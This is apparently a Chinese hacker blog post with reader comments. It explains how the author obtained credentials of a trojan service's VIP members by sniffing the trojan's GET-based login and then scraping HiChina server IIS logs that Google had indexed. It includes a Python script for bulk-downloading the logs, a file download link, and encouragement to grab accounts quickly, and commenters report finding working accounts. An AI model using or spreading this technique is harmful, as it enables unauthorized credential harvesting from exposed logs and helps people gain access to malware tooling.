万网虚拟机漏洞,拿某VIP木马所有会员

昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。

想起来偶以前拿了另一个VIP马过程,心里痒痒,打算试试。

上次拿了那个VIP马会员用了WHOIS拿的,不小心公布了出去,结果木马作者直接重新生成了所有用户。

经验教训,这次拿到了绝对不能公布。

这次的VIP验证和灰鸽子的大同小异,都是把用户名密码扔到验证服务器,验证后下载服务端。

所以会发送用户名密码出去。

监听本地通讯,得到地址:http://xxx/ip/20071125xxxx.asp?user=kxlzx&pass=kanhenmekan!&version=1.0

如果验证成功,返回一个EXE文件。

可以得到信息:
1,HTTP协议
2,GET方式提交数据

GET数据也就是说,IIS会把日志记录下来,日志里会有密码。。。

类似于:

code:



20080126-00:47:40 66.249.xxx 200 http://xxx/ip/20071125xxxx.asp user=kxlzx&pass=kanhenmekan!&version=1.0

20080126-00:54:02 66.249.xxx 500 http://xxx/check.asp |-|ASP_0113|脚本超时 181578

当然之前并不知道居然能拿到日志。


获取了验证文件地址后,在google搜索该木马的域名,居然搜到了万网的日志记录。。。。无语。。。

注意记录的格式:

20080218-00:41:05 124.132xxx 200 http://www.xxx …… 218.19xxx 200 http://www.xxx/ip/20071026Psxxx.asp user=jeffrey8273&pass=fedoracore…
cn-22.hichina.com/asplog/log20080218.txt – 38k – 网页快照 – 类似网页

20080220-00:37:26 194.110xxx 200 http://www.xxx…… http://www.xxx/ip/20071026xx.asp user=kalaam&pass=ne
|-|ASP_0113|脚本超时107125 …
cn-22.hichina.com/asplog/log20080220.txt – 38k – 网页快照 – 类似网页

这里:cn-22.hichina.com/asplog/log20080220.txt
cn-22.hichina.com是万网的服务器,log20080220.txt 是日志地址。
明明验证的服务器不再万网,这个日志为什么记录了vip木马的用户呢?

推测是这样的,该VIP用户验证服务器曾经放在万网,被记录下来了。而万网有着良好的保存日志习惯。

既然里面有VIP用户,就不客气了,python写了个脚本,抓他们。

code:



import urllib
month=1
while(month<7):
day=0
while(day<32):
tmp = ”+str(month)+str(day)
if (len(tmp)==2):
tmp = str(month)+tmp
strtmp = ‘http://cn-22.hichina.com/asplog/log20070’+tmp+’.txt’
sock = urllib.urlopen(strtmp)
htmlSource = sock.read()
sock.close()
strpath = ‘log20080’+tmp+’.txt’
f = file(strpath, ‘w’)
f.write(htmlSource)
f.close()
day=day+1

print tmp
month = month+1


PS: 抓到后,按照原来的文件名保存下来。其实也可以用迅雷抓,为什么要用python呢?
-_-!这不刚学了python,显摆么。。。。

抓下来的文件,拿editplus搜索该域名,得到了N多用户名密码。就不抓图了,免得某些人转载的时候说咱写的东西图太多。。。

运气好的哥们儿速度抓撒,能拿到了也别传啊。。。

[file=uploads/200806/19_095358_z.rar]Click Here To Download[/file]

这里下载。。。

发表评论?

6 条评论。

  1. 早上看到你的文章。抓紧测试了。37#。想了什么马。。嘎嘎居然被我想到了。
    按你的思路。嘎嘎。用了几个引擎。就找到4页面。郁闷。郁闷的是就一个帐号可用。。
    不错了。但不知道为什么日志文件都不能访问了其他服务器好象有些可一访问。怪。。。

    ycwz.org

  2. 文章的重要部分全部都被我屏蔽了,你看到的地址都是假的,除了代码和思路是真的意外。
    其他的都没有爆的。

  3. 把万网dns搞了不就得了 

  4. 晕。屏蔽个P啊。大哥。要我说出来?我说了37号。但就是无法访问了。看了4张快照。找 了几个帐号。搞不懂
    。有几个帐号都是有规律的。ZBY****。用户名。但有其他几个。不是规律的。不能用。看了你的文章一眼就知道是什么木马了。

  5. 日志能直接下载?
    不知道是怎么配置成这样的…

  6. 呵呵,是这样的,当天早上,37号已经不能访问了。
    其他的还可以的。帐号没你说的夸张,你拿的是07年的日志吧,是个陷阱,真正的帐号,好用的都在08年呢。。。哈哈!

    miao:我也很奇怪,你说日志能下载我已经无语了,他竟然把日志弄到google上。。。哎。。。。

发表评论